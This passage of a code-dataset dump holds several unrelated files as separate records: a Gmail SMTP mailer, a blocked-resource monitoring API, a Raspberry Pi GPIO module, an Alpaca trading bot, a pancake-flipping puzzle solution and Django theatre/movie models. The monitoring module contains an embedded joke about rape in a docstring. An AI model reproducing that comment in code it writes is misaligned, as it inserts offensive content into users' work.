smtplib.SMTP('smtp.gmail.com:587')\r\n\t\ts.starttls()\r\n\t\ts.login(self.sender,self.senderpass)\r\n\t\ts.sendmail(self.sender, self.recipients, msg.as_string())\r\n\t\t#test\r\n\t\t# print msg\r\n\t\ts.quit()\r\n\t\r\n\tdef htmladd(self, html):\r\n\t\tself.htmlbody = self.htmlbody+'

'+html\r\n \r\n\tdef attach(self,msg):\r\n\t\tfor f in self.attachments:\r\n\t\t\r\n\t\t\tctype, encoding = mimetypes.guess_type(f)\r\n\t\t\tif ctype is None or encoding is not None:\r\n\t\t\t\tctype = \"application/octet-stream\"\r\n\t\t\t\t\r\n\t\t\tmaintype, subtype = ctype.split(\"/\", 1)\r\n \r\n \r\n\t\t\tif maintype == \"text\":\r\n\t\t\t\tfp = open(f)\r\n\t\t\t\t# Note: we should handle calculating the charset\r\n\t\t\t\tattachment = MIMEText(fp.read(), _subtype=subtype)\r\n\t\t\t\tfp.close()\r\n\t\t\telif maintype == \"image\":\r\n\t\t\t\tfp = open(f, \"rb\")\r\n\t\t\t\tattachment = MIMEImage(fp.read(), _subtype=subtype)\r\n\t\t\t\tfp.close()\r\n\t\t\telif maintype == \"audio\":\r\n\t\t\t\tfp = open(f, \"rb\")\r\n\t\t\t\tattachment = MIMEAudio(fp.read(), _subtype=subtype)\r\n\t\t\t\tfp.close()\r\n\t\t\telse:\r\n\t\t\t\tfp = open(f, \"rb\")\r\n\t\t\t\tattachment = MIMEBase(maintype, subtype)\r\n\t\t\t\tattachment.set_payload(fp.read())\r\n\t\t\t\tfp.close()\r\n\t\t\t\tencoders.encode_base64(attachment)\r\n\t\t\tattachment.add_header(\"Content-Disposition\", \"attachment\", filename=f)\r\n\t\t\tattachment.add_header('Content-ID', '<{}>'.format(f))\r\n\t\t\tmsg.attach(attachment)\r\n\t\r\n\tdef addattach(self, files):\r\n\t\tself.attachments = self.attachments + files\r\n \r\n \r\n \r\n#example below\r\nif __name__ == '__main__':\t\r\n\t# subject and recipients\r\n\tmymail = Bimail('Sales email ' +datetime.now().strftime('%Y/%m/%d'), ['rsmitra@gmail.com'])\r\n\t#start html body. Here we add a greeting. \r\n\tmymail.htmladd('Good morning, find the daily summary below.')\r\n\t#Further things added to body are separated by a paragraph, so you do not need to worry about newlines for new sentences\r\n\t#here we add a line of text and an html table previously stored in the variable\r\n\tmymail.htmladd('Daily sales')\r\n\t##mymail.htmladd(htmlsalestable)\r\n\t#another table name + table\r\n\tmymail.htmladd('Daily bestsellers')\r\n\t##mymail.htmladd(htmlbestsellertable)\r\n\t# add image chart title\r\n\tmymail.htmladd('Weekly sales chart')\r\n\t#attach image chart\r\n\tmymail.addattach(['/home/pi/Desktop/Python/image.jpg'])\r\n\t#refer to image chart in html\r\n\t#mymail.htmladd('') \r\n\t#attach another file\r\n\tmymail.addattach(['bimail.py'])\r\n\t#send!\r\n\tmymail.send()\r\n\r\n","sub_path":"email/bimail.py","file_name":"bimail.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"553270281","text":"from db import dbmon\n\nimport api.restrictions\nimport api.caching\nimport ipaddress\nfrom datetime import datetime\n\n\"\"\"\nThis module provides API for monitoring\nAnd every function must return strictly single scalar value.\nReturn type doesn't matters, but must be serializable.\n\"\"\"\n\n\ndef testConn(**kwargs):\n \"\"\"\n Tests a connection.\n :return:\n \"\"\"\n try:\n dbmon.testDBConn()\n return 0\n except:\n return 1\n\n\ndef getLastExitCode(procname):\n exit_code = dbmon.getLastExitCode(procname)\n if exit_code is None:\n \"\"\"Eleven english gentlemen are raping the german women...\"\"\"\n return 9\n \"\"\"...Two english gentlemen are going away\"\"\"\n return exit_code\n\n\ndef getBlockedIPCount(ipv6=False, **kwargs):\n prefixes = map(ipaddress.ip_network,\n api.caching.getDataCached(\n api.restrictions.getBlockedPrefixes,\n collapse=False,\n ipv6=ipv6,\n **kwargs)\n )\n return sum(map(lambda x: x.num_addresses, prefixes))\n\n\ndef getBlockedSubnetsCount(collapse=False, ipv6=False, **kwargs):\n prefixes = api.caching.getDataCached(\n api.restrictions.getBlockedPrefixes,\n collapse=collapse,\n ipv6=ipv6,\n **kwargs)\n return len(prefixes)\n\n\ndef getBlockedDNSCount(collapse=False, **kwargs):\n domains = api.caching.getDataCached(\n api.restrictions.getBlockedDNS,\n collapse=collapse,\n **kwargs)\n return len(domains)\n\n\ndef getBlockedWildcardDNSCount(collapse=False, **kwargs):\n wdomains = api.caching.getDataCached(\n api.restrictions.getBlockedWildcardDNS,\n collapse=collapse,\n **kwargs)\n return len(wdomains)\n\n\ndef getBlockedURLsCount(**kwargs):\n # It could be done with count() SQL,\n # but cache reuse is preferred.\n urls = api.caching.getDataCached(\n api.restrictions.getBlockedURLs,\n cutproto=True,\n **kwargs)\n return len(urls)\n\n\ndef getDumpLag():\n \"\"\"\n :return: Dump lag in seconds\n \"\"\"\n last = dbmon.getLastDumpTime()\n if last is None:\n return -1\n return round((datetime.now().astimezone() - last).total_seconds())\n\n\ndef getDumpCheckLag():\n \"\"\"\n :return: Parse lag in seconds\n \"\"\"\n last = dbmon.getLastCheckTime()\n if last is None:\n return -1\n return round((datetime.now().astimezone() - last).total_seconds())\n\n\ndef getLastDumpTS():\n \"\"\"\n :return: Dump unix timestamp in seconds\n \"\"\"\n last = dbmon.getLastDumpTime()\n if last is None:\n return -1\n return round(last.timestamp())","sub_path":"rkn/api/monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"627088628","text":"import asyncio\nimport enum\nimport logging\n\nfrom RPi import GPIO\n\nfrom bermudafunk import base\nfrom bermudafunk.base import loop\n\nlogger = logging.getLogger(__name__)\n\n_initialized = None\n\n_buttons = {}\n_leds = {}\n\n_used_pins = {}\n\n_pin_events = asyncio.Queue(loop=base.loop)\n\n\nclass LedState(enum.Enum):\n OFF = 'off'\n ON = 'on'\n BLINK = 'blink'\n\n\nclass DummyLed:\n def __init__(self) -> None:\n self._state = LedState.OFF\n self._blink_freq = 2\n\n @property\n def blink_freq(self) -> float:\n return self._blink_freq\n\n @blink_freq.setter\n def blink_freq(self, new_freq: float):\n assert new_freq > 0\n self._blink_freq = new_freq\n\n @property\n def state(self) -> LedState:\n return self._state\n\n @state.setter\n def state(self, new_val: LedState):\n self._state = new_val\n\n\nclass Led(DummyLed):\n def __init__(self, pin):\n super().__init__()\n global _leds\n _leds[str(pin)] = self\n\n self._pin = int(pin)\n\n self._blink_task = None\n\n _setup()\n _check_pin(self._pin, 'led')\n GPIO.setup(self._pin, GPIO.OUT)\n GPIO.output(self._pin, GPIO.LOW)\n\n def __del__(self):\n if self._blink_task is not None:\n self._blink_task.cancel()\n GPIO.output(self._pin, GPIO.LOW)\n\n @property\n def state(self) -> LedState:\n return self._state\n\n @state.setter\n def state(self, new_state: LedState):\n if self._state == new_state:\n return # Same state, nothing to change\n\n self._state = new_state\n\n if self._blink_task is not None:\n self._blink_task.cancel()\n self._blink_task = None\n\n if new_state is LedState.ON:\n GPIO.output(self._pin, GPIO.HIGH)\n elif new_state is LedState.OFF:\n GPIO.output(self._pin, GPIO.LOW)\n elif new_state is LedState.BLINK:\n self._blink_task = loop.create_task(self._blink())\n\n async def _blink(self):\n while True:\n GPIO.output(self._pin, GPIO.HIGH)\n await asyncio.sleep(1 / self._blink_freq)\n GPIO.output(self._pin, GPIO.LOW)\n await asyncio.sleep(1 / self._blink_freq)\n\n\ndef _setup():\n global _initialized\n if not isinstance(_initialized, asyncio.Task) or _initialized.cancelled():\n logger.debug('setup')\n logger.debug('setup GPIO.setmode')\n GPIO.setmode(GPIO.BOARD)\n logger.debug('setup create process_event loop task')\n _initialized = loop.create_task(_process_event())\n logger.debug('setup create cleanup task')\n base.cleanup_tasks.append(loop.create_task(_cleanup()))\n\n\ndef _check_pin(pin, usage):\n global _used_pins\n pin = int(pin)\n if pin not in _used_pins:\n _used_pins[pin] = usage\n if pin in _used_pins and _used_pins[pin] == usage:\n return True\n raise Exception('pin %s already used as %s instead of %s' % (pin, _used_pins[pin], usage))\n\n\nasync def _cleanup():\n logger.debug('cleanup awaiting')\n await base.cleanup_event.wait()\n logger.debug('cleanup cancel process_event')\n _initialized.cancel()\n for _, led in _leds.items():\n led.state = LedState.OFF\n logger.debug('cleanup reset GPIO')\n GPIO.cleanup()\n\n\ndef register_button(pin, callback=None, coroutine=None, override=False, **kwargs):\n global _buttons\n _setup()\n pin = int(pin)\n if not override and pin in _buttons:\n logger.debug('register_button override not forced so do not override')\n return False\n logger.debug('register_button %s', pin)\n _check_pin(pin, 'button')\n GPIO.setup(pin, GPIO.IN, **kwargs)\n GPIO.add_event_detect(pin, GPIO.RISING, callback=_callback, bouncetime=300)\n _buttons[str(pin)] = {'pin': pin, 'callback': callback, 'coroutine': coroutine}\n\n\ndef remove_button(pin):\n global _buttons\n GPIO.remove_event_detect(pin)\n del _buttons[str(pin)]\n\n\nasync def _process_event():\n global _buttons\n while True:\n pin = await _pin_events.get()\n something_executed = False\n if pin in _buttons:\n if _buttons[pin]['callback'] is not None:\n logger.debug('callback will be called soon')\n loop.call_soon(_buttons[pin]['callback'], int(pin))\n something_executed = True\n if _buttons[pin]['coroutine'] is not None:\n logger.debug('coroutine scheduled as a task')\n loop.create_task(_buttons[pin]['coroutine'](int(pin)))\n something_executed = True\n if not something_executed:\n logger.debug('No callback & no coroutine defined')\n\n\ndef _callback(pin):\n logger.debug('Button press detected; put pin in queue %s' % (pin,))\n loop.call_soon_threadsafe(asyncio.ensure_future, _pin_events.put(str(pin)))\n","sub_path":"bermudafunk/GPIO.py","file_name":"GPIO.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"639210659","text":"'''\n\n############### Read Me ###############\n \n### Name of strategy: Robot Aiur 1.33\n\nAiur 1.33 = Aiur 1.32 + logs are saved to a file\n\n\n### Robot Aiur 1.00 (recap)\n\nEntry rules:\n- Long TSLA if it rises more than 5% in the last 5 days.\n- Short TSLA if it falls more than 5% in the last 5 days.\n\nExit rules:\n- Take profit of 10%\n- Stop loss of 5%\n\nSizing:\n- 1 share per trade.\n- We only hold 1 trade at a time.\n\nAssumptions:\n- We assume that, before we launch this robot, we are not currently not holding a position on TSLA that was entered by Aiur 1.00 \n \nMade by the guys at AlgoTrading101.com\n\n'''\n\n# Docs: https://github.com/alpacahq/alpaca-trade-api-python/tree/cd22b3393aff8df214d867b6a4723a21ea34a3c0\n\n############### Admin Section ###############\n\nimport alpaca_trade_api as tradeapi\nimport time, logging, os\n\n\n### Step 1: Authentication and connection details\n\napi_key = os.environ.get('my_api_key') # Alpaca API key\napi_secret = os.environ.get('my_api_secret') # Alpaca API Secret\nbase_url = os.environ.get('my_base_url') # Alpaca's base URL\nticker = os.environ.get('ticker_to_trade') # The asset we are trading\ncurrent_order_id = int(os.environ.get('order_id')) # Our order id number. Change this if this order id has already been taken\nlong_percent_change = float(os.environ.get('entry_long_percent_change')) # Percent change of ticker to initate long entry trade\nshort_percent_change = float(os.environ.get('entry_short_percent_change')) # Percent change of ticker to initate short entry trade\nlogname = os.environ.get('my_log_name') # Name of the saved log file\n\n### Step 2: Instantiate REST API \n\napi = tradeapi.REST(api_key, api_secret, base_url, api_version='v2')\n\n### Step 3: Create basic logging configuration \n\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n## Set logger for saving logs\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s: %(levelname)s: %(message)s', filename=logname, filemode='a')\n\n## Set a logger for displaying logs\n# Define a Handler which writes messages\nconsole = logging.StreamHandler()\n# Write messages of priority INFO or higher\nconsole.setLevel(logging.INFO)\n# Set a format which is simpler for console use\nformatter = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')\n# Tell the handler to use this format\nconsole.setFormatter(formatter)\n# Add the handler to the root logger\nlogging.getLogger('').addHandler(console)\n\n\n### Step 4: Set up variables for later use\n\ntake_profit_percent = 10 # E.g. 2 means 2% take profit\nstop_loss_percent = 5 # E.g. 2 means 2% stop loss\n\nin_long_position = False # We assume we are not in a long position when we start the algo. This should always be false.\nin_short_position = False # We assume we are not in a short position when we start the algo. This should always be false.\n\ntake_profit_level = None\nstop_loss_level = None\n\nrisk_per_trade = 1 # How much of your equity to risk per trade\n\nmax_position_size_per_order = 5 # (#component1)\nmax_total_position_size = 50 # (#component2)\nmax_num_orders_day = 2 # (#component3)\n\norder_tracker = []\n\n\n############### Functions Section ###############\n\ndef check_risk_mgmt(ticker, direction, share_quantity, max_position_size_per_order, max_total_position_size):\n \n original_share_quantity = share_quantity\n \n # Limit order size to specified value. (#component1)\n if share_quantity > max_position_size_per_order:\n share_quantity = max_position_size_per_order \n logging.warning(f'Order size limit of {max_position_size_per_order} reached.')\n logging.warning(f'Order size reduced from {original_share_quantity} to {share_quantity}.')\n \n # Limit total position we can hold for our ticker (#component2)\n try:\n current_pos = int(api.get_position(ticker).qty)\n except Exception as e:\n if str(e) == 'position does not exist':\n current_pos = 0\n\n if direction == 'sell':\n attempted_order_size = -share_quantity \n else:\n attempted_order_size = share_quantity\n\n if abs(current_pos + attempted_order_size) > max_total_position_size:\n share_quantity = max(max_total_position_size - abs(current_pos), 0) \n logging.warning(f'Maximum {ticker} position of {max_total_position_size} reached.')\n logging.warning(f'Order size reduced from {original_share_quantity} to {share_quantity}.')\n\n return share_quantity\n\n\ndef number_of_orders_today(order_tracker, today_date):\n\n # Check total number of orders today\n\n num_positions = []\n for stamp in order_tracker:\n if stamp == today_date:\n num_positions.append(True)\n \n logging.info(f'We have entered {len(num_positions)} orders today')\n \n return len(num_positions)\n \n\ndef fire_trade(ticker, direction, share_quantity, current_order_id, max_position_size_per_order, max_total_position_size): \n # Fires a trade (can be an entry or exit). All trades fired are market orders.\n \n share_quantity = check_risk_mgmt(ticker, direction, share_quantity, max_position_size_per_order, max_total_position_size)\n \n if share_quantity > 0:\n \n order_info = api.submit_order(\n symbol=ticker,\n qty=share_quantity,\n side=direction,\n time_in_force='gtc',\n type='market',\n client_order_id='Aiur_' + str(current_order_id),\n )\n \n if order_info.status == 'accepted':\n \n time.sleep(3) # Give it a few seconds to process the order...\n \n order_info_status = api.get_order_by_client_order_id('Aiur_' + str(current_order_id)).status\n \n filled_price = api.get_order_by_client_order_id('Aiur_' + str(current_order_id)).filled_avg_price\n \n logging.info(f'Order status for {direction} trade: {order_info_status}')\n logging.info(f'{direction} order price: {filled_price}')\n \n return order_info_status, float(filled_price), share_quantity\n \n else:\n \n logging.warning(f'Order for {direction} trade NOT filled. Status: {order_info.status}')\n \n return order_info.status, None, 0\n \n else:\n\n return 'Did not fire order', None, 0\n\ndef fire_entry_trade(ticker, direction, tp_percent, sl_percent, current_price, risk_per_trade, current_order_id, max_position_size_per_order, max_total_position_size): \n # All trades fired are market orders. Includes take-profit and stop-loss \n # Calculate amount of shares to buy \n\n # Calculate take-profit and stop-loss\n if direction == 'buy':\n take_profit_level = round(current_price * (1 + tp_percent / 100), 2) # Calculate take profit level. Round to 2 decimal places\n stop_loss_level = round(current_price * (1 - sl_percent / 100), 2) # Calculate stop loss level. Round to 2 decimal places\n\n # Set take-profit and stop-loss\n elif direction == 'sell':\n take_profit_level = round(current_price * (1 - tp_percent / 100),2) # Calculate take profit level. Round to 2 decimal places\n stop_loss_level = round(current_price * (1 + sl_percent / 100),2) # Calculate stop loss level. Round to 2 decimal places\n\n\n # Calculate position size\n share_quantity = calc_shares(current_price, stop_loss_level, risk_per_trade) \n \n if share_quantity > 0:\n\n # Check if entry is allowed\n if entry_allowed(ticker, share_quantity, current_price): # Aiur 1.2 addition\n\n order_status_new_trade, filled_price, share_quantity_traded = fire_trade(ticker, direction, share_quantity, current_order_id, max_position_size_per_order, max_total_position_size) # Fire a trade\n\n if order_status_new_trade == 'filled':\n logging.info(f'{direction} entry TP price: {take_profit_level}')\n logging.info(f'{direction} entry SL price: {stop_loss_level}')\n\n return order_status_new_trade, filled_price, take_profit_level, stop_loss_level, share_quantity_traded\n\n else:\n \n return 'Did not fire order', None, None, None, 0\n \n else:\n \n return 'Did not fire order', None, None, None, 0\n \ndef entry_allowed(ticker, share_quantity, current_price): \n # Check to see if we can't open an entry order due to PDT rule or lack of buying power\n \n # Check to see account is blocked\n account = api.get_account()\n \n if account.pattern_day_trader:\n logging.warning('Account is blocked due to PDT rule. No new entry orders can be fired.')\n return False\n\n # Check to see if we have enough buying power to execute a trade \n if float(account.buying_power) < share_quantity * current_price:\n logging.warning(f'Not enough buying power for a entry trade of {share_quantity} shares of {ticker}.')\n return False\n \n return True # Returns True is entry orders are allowed, False otherwise.\n \ndef wait_for_market_open(): \n # Check to see if the market is open - wait for open if it is not\n \n clock = api.get_clock()\n if not clock.is_open:\n time_to_open = (clock.next_open - clock.timestamp).total_seconds()\n logging.warning(f'Market is not open, going to sleep for {time_to_open:.2f} seconds')\n time.sleep(time_to_open)\n \n\ndef calc_shares(entry_price, stop_price, risk_percent): \n # Calculate amount of shares to buy \n\n account_balances = api.get_account()\n equity = float(account_balances.equity)\n risk_amount = equity * risk_percent / 100 \n risk_per_share = abs(entry_price - stop_price)\n\n return round(risk_amount / risk_per_share)\n\n############### Strategy Section ###############\n \n# Check to see if our asset is tradable before starting main strategy loop \n\nassets = api.list_assets(status='active')\nactive_assets = [i.symbol for i in assets]\nif ticker not in active_assets:\n logging.error(f'{ticker} is not tradable - halting strategy')\n quit(0)\n\nwhile True:\n\n logging.info('--------- Start of current 10 second period ---------')\n\n\n ### Step 1: Check to see if the market is open - wait for open if it is not \n\n wait_for_market_open() \n\n ### Step 2: Get data and calculate required variables\n \n barset = api.get_barset(ticker, 'day', limit=10) # Get daily price data for TSLA over the last 10 trading days.\n tsla_bars = barset.df[ticker] # Isolate just the bar data for TSLA\n\n today_close = tsla_bars.close[-1] \n current_price = today_close # To reduce confusion since today's closing price = current price if today's market session has not ended.\n five_days_ago_close = tsla_bars.close[-6]\n percent_change = ((today_close - five_days_ago_close) / five_days_ago_close * 100) # Percentage change over the last 5 days\n\n logging.info(f'{ticker} moved {percent_change:.2f}% over the last 5 days') \n\n today_date = tsla_bars.index[-1].date() \n\n order_status = None # Reset order status\n order_filled_price = None # Reset order filled price\n\n ### Step 3: Check to see account is blocked\n account = api.get_account()\n\n if any([account.account_blocked, account.trading_blocked]):\n logging.warning('Account is blocked - exiting.. ')\n quit(0)\n\n ### Step 4: Check for exit signal and close our trades if there are exit signals\n \n if in_long_position:\n # We are in a long position - Check for exit\n \n if today_close > take_profit_level or today_close < stop_loss_level: # Check if prices crosses take-profit or stop-loss levels\n order_status, filled_price, share_quantity_exited = fire_trade(ticker, 'sell', share_quantity_entered, current_order_id, max_position_size_per_order, max_total_position_size)\n if order_status == 'filled':\n in_long_position = False\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We exited our LONG trade of {share_quantity_exited} shares at exit price: {filled_price}!')\n\n elif in_short_position:\n # We are in a short position - Check for exit\n \n if today_close < take_profit_level or today_close > stop_loss_level: # Check if prices crosses take-profit or stop-loss levels\n order_status, filled_price, share_quantity_exited = fire_trade(ticker, 'buy', share_quantity_entered, current_order_id, max_position_size_per_order, max_total_position_size)\n if order_status == 'filled':\n in_short_position = False\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We exited our SHORT trade of {share_quantity_exited} shares at exit price: {filled_price}!')\n \n \n ### Step 5: Check for entry signal and enter a new trades if there are entry signals\n \n elif not in_long_position and not in_short_position: \n # We are not in a position - Look for an entry\n # Insert long entry rule here\n if percent_change > long_percent_change:\n # Long trade signal\n\n # (#component3) \n if number_of_orders_today(order_tracker, today_date) < max_num_orders_day:\n \n order_status, filled_price, take_profit_level, stop_loss_level, share_quantity_entered = fire_entry_trade(ticker,\n 'buy', \n take_profit_percent, \n stop_loss_percent, \n current_price, \n risk_per_trade,\n current_order_id,\n max_position_size_per_order, \n max_total_position_size)\n\n if order_status == 'filled':\n in_long_position = True\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We entered a LONG trade of {share_quantity_entered} shares at entry price: {filled_price}!')\n\n order_tracker.append(today_date)\n \n else:\n \n logging.warning(f'Maximum number of orders per day of {max_num_orders_day} is reached.')\n logging.warning(f'Long entry signal triggered but entry order NOT fired.')\n\n # Insert short entry rule here\n elif percent_change < short_percent_change:\n # Short trade signal\n\n # (#component3)\n if number_of_orders_today(order_tracker, today_date) < max_num_orders_day:\n\n order_status, filled_price, take_profit_level, stop_loss_level, share_quantity_entered = fire_entry_trade(ticker,\n 'sell', \n take_profit_percent, \n stop_loss_percent, \n current_price, \n risk_per_trade,\n current_order_id,\n max_position_size_per_order, \n max_total_position_size)\n if order_status == 'filled':\n in_short_position = True\n current_order_id += 1 # Increase client order id by 1\n logging.info(f'We entered a SHORT trade of {share_quantity_entered} shares at entry price: {filled_price}!')\n\n order_tracker.append(today_date)\n \n else:\n \n logging.warning(f'Maximum number of orders per day of {max_num_orders_day} is reached.')\n logging.warning(f'Short entry signal triggered but entry order NOT fired.')\n \n \n ### Step 6: Rest for a few seconds before running the Strategy Section again on new price updates\n\n # Get current positions\n try:\n total_positions_ticker = int(api.get_position(ticker).qty)\n except Exception as e:\n if str(e) == 'position does not exist':\n total_positions_ticker = 0\n \n account = api.get_account()\n\n logging.info(f'{ticker}\\'s current price is {today_close}')\n logging.info(f'We currently hold {total_positions_ticker} shares of {ticker}')\n logging.info(f'Our account equity is ${account.equity}')\n logging.info(f'Our account buying power is ${account.regt_buying_power}')\n logging.info('--------- End of current 10 second period ---------')\n time.sleep(10) # Rest for 10 seconds\n","sub_path":"Alpaca-AlgoTrading101-Chapter-10/Robot-Aiur-1.33.py","file_name":"Robot-Aiur-1.33.py","file_ext":"py","file_size_in_byte":17687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308521614","text":"\ndef total_flipping_count(stack):\n\tflip_count = 0\n\tcal_stack = stack\n\twhile(True):\n\t\tif all_happy_side(cal_stack):\n\t\t\treturn flip_count\n\t\telse:\n\t\t\tcal_stack = flip_pancakes(cal_stack)\t\n\t\tflip_count += 1\n\n\ndef all_happy_side(stack):\n\tfor c in stack:\n\t\tif c is \"-\":\n\t\t\treturn False\n\treturn True\n\n\ndef flip_pancakes(stack):\n\tpart_stack = []\n\tpos = 0\n\tfor cake in stack:\n\t\tif pos > 0 and part_stack[pos-1] is not cake:\n\t\t\treturn flipping(stack, part_stack)\n\t\telse:\n\t\t\tpart_stack.append(cake)\n\t\tpos += 1\t\n\n\treturn flipping(stack, part_stack)\n\t\n\ndef flipping(stack, part_stack):\n\ttemp_stack = []\n\tfor c in part_stack:\n\t\ttemp_stack.append(\"-\" if c is \"+\" else \"+\")\n\ttemp_stack.reverse()\t\n\treturn temp_stack + stack[len(temp_stack):len(stack)]\n\n\nt = int(input())\nfor i in range(1, t + 1):\n\tpancake_stack = [c for c in input()]\n\tprint(\"Case #{}: {}\".format(i, total_flipping_count(pancake_stack)))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_bono83_B-large.py","file_name":"16_0_2_bono83_B-large.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108495396","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass SpectacleManager(models.Manager):\n def get_related_object(self, spectacle):\n if not spectacle:\n return self\n else:\n if spectacle.spectacle_type == 'FILME':\n return spectacle.movie_set.first()\n elif spectacle.spectacle_type == 'SHOW':\n return spectacle.show_set.first()\n elif spectacle.spectacle_type == 'PECA':\n return spectacle.play_set.first()\n\n def get_parent_object(self, spectacle):\n if not spectacle:\n return self\n else:\n return Spectacle.objects.get(\n id=spectacle.spectacle_id\n )\n\n\nclass SpectacleComponent(models.Model):\n class Meta:\n abstract = True\n\n PREESTREIA = 'PREESTREIA'\n EMCARTAZ = 'EMCARTAZ'\n LANCAMENTO = 'LANCAMENTO'\n FORACARTAZ = 'FORACARTAZ'\n EMBREVE = 'EMBREVE'\n\n LIVRE = 'LIVRE'\n DEZANOS = '10ANOS'\n DOZEANOS = '12ANOS'\n QUATORZEANOS = '14ANOS'\n DEZESSEISANOS = '16ANOS'\n MAIORESDEDEZOITO = 'MAIORES18'\n\n FILME = 'FILME'\n SHOW = 'SHOW'\n PECA ='PECA'\n NA = 'NA'\n\n STATUS_CHOICES = (\n (PREESTREIA, 'Pré-Estréia'),\n (EMCARTAZ, 'Em Cartaz'),\n (LANCAMENTO, 'Lançamento'),\n (FORACARTAZ, 'Fora de Cartaz'),\n (EMBREVE, 'Em Breve'),\n )\n\n CLASSIFICATION_CHOICES = (\n (LIVRE, 'Livre'),\n (DEZANOS, '10 Anos'),\n (DOZEANOS, '12 Anos'),\n (QUATORZEANOS, '14 Anos'),\n (DEZESSEISANOS, '16 Anos'),\n (MAIORESDEDEZOITO, 'Maiores de 18 Anos'),\n )\n\n SPECTACLE_CHOICES = (\n (FILME, 'Filme'),\n (SHOW, 'Show'),\n (PECA, 'Peça Teatral'),\n (NA, 'N/A'),\n )\n\n name = models.CharField(\n verbose_name=_('Nome'),\n help_text=_('Nome da Espetáculo'),\n max_length=100,\n default=\"\",\n )\n\n status = models.CharField(\n verbose_name=_('Status do Espetáculo'),\n help_text=_('Status do Espetáculo'),\n max_length=15,\n choices=STATUS_CHOICES,\n default=EMBREVE\n )\n\n poster = models.ImageField(\n upload_to='media/',\n help_text=_(\"Poster do Espetáculo\"),\n verbose_name=_('Poster'),\n blank=True,\n null=True,\n max_length=500\n )\n\n duration = models.PositiveIntegerField(\n verbose_name=_('Duração'),\n help_text=_('Duração do Espetáculo em minutos'),\n default=0\n )\n\n classification = models.CharField(\n verbose_name=_('Classificação Indicativa'),\n help_text=_('Classificação Indicativa do Espetáculo'),\n max_length=20,\n choices=CLASSIFICATION_CHOICES,\n default=LIVRE\n )\n\n spectacle_type = models.CharField(\n verbose_name=_('Tipo do Espetáculo'),\n help_text=_('Tipo do Espetáculo'),\n max_length=15,\n choices=SPECTACLE_CHOICES,\n default=NA\n )\n\n objects = SpectacleManager()\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('spectacle:spectacle-detail', kwargs={'id': self.id})\n\n\nclass Spectacle(SpectacleComponent):\n class Meta:\n verbose_name = _(\"Espetáculo\")\n verbose_name_plural = _(\"Espetáculos\")\n\n\nclass SpectacleDecorator(SpectacleComponent):\n class Meta:\n abstract = True\n\n spectacle = models.ForeignKey(\n Spectacle,\n on_delete=models.PROTECT\n )\n\n\nclass Movie(SpectacleDecorator):\n class Meta:\n verbose_name = _(\"Filme\")\n verbose_name_plural = _(\"Filmes\")\n\n ANIMACAO = 'ANIMACAO'\n ACAO = 'ACAO'\n BIOGRAFIA = 'BIOGRAFIA'\n COMEDIA = 'COMEDIA'\n DOCUMENTARIO = 'DOCUMENTARIO'\n DRAMA = 'DRAMA'\n FICCAO = 'FICCAO'\n MUSICAL = 'MUSICAL'\n ROMANCE = 'ROMANCE'\n SUSPENSE = 'SUSPENSE'\n TERROR = 'TERROR'\n NA = 'NA'\n\n MOVIE_GENDER_OPTIONS = (\n (ANIMACAO, 'Animação'),\n (ACAO, 'Ação'),\n (BIOGRAFIA, 'Biografia'),\n (COMEDIA, 'Comédia'),\n (DOCUMENTARIO, 'Documentário'),\n (DRAMA, 'Drama'),\n (FICCAO, 'Ficção Científica'),\n (MUSICAL, 'Musical'),\n (NA, 'N/A'),\n (ROMANCE, 'Romance'),\n (SUSPENSE, 'Suspense'),\n (TERROR, 'Terror'),\n )\n\n synopsis = models.TextField(\n verbose_name=_('Sinopse'),\n help_text=_('Sinopse do Filme'),\n max_length=500,\n default=\"\"\n )\n\n diretor = models.CharField(\n verbose_name=_('Diretor'),\n help_text=_('Diretor do Filme'),\n max_length=255,\n default=\"\"\n )\n\n cast = models.TextField(\n verbose_name=_('Elenco'),\n help_text=_('Elenco participante do Filme'),\n max_length=500,\n default=\"\"\n )\n\n producer = models.CharField(\n verbose_name=_('Produtor'),\n help_text=_('Produtor do Filme'),\n max_length=255,\n default=\"\"\n )\n\n writer = models.CharField(\n verbose_name=_('Escritor'),\n help_text=_('Escritor do Filme'),\n max_length=255,\n default=\"\"\n )\n\n gender = models.CharField(\n verbose_name=_('Genêro'),\n help_text=_('Genêro do Filme'),\n choices=MOVIE_GENDER_OPTIONS,\n max_length=20,\n default=NA\n )\n\n trailer = models.CharField(\n verbose_name=_('Trailer'),\n help_text=_('Link do Trailer do Filme'),\n max_length=255,\n default=\"\"\n )\n\n def __str__(self):\n return self.spectacle.name\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n spectacle = Spectacle.objects.get(id=self.spectacle_id)\n self.name = spectacle.name\n self.status = spectacle.status\n if spectacle.poster:\n self.poster = spectacle.poster\n self.duration = spectacle.duration\n self.classification = spectacle.classification\n self.spectacle_type = spectacle.spectacle_type\n super(Movie, self).save()\n\n\nclass Play(SpectacleDecorator):\n class Meta:\n verbose_name = _(\"Peça Teatral\")\n verbose_name_plural = _(\"Peças Teatrais\")\n\n AUTO = 'AUTO'\n BURLESCO = 'BURLESCO'\n CIRCENSE = 'CIRCENSE'\n COMEDIA = 'COMEDIA'\n DRAMA = 'DRAMA'\n FARSA = 'FARSA'\n MIMICA = 'MIMICA'\n MUSICAL = 'MUSAICAL'\n OUTROS = 'OUTROS'\n TRAGEDIA = 'TRAGEDIA'\n TRAGICOMEDIA = 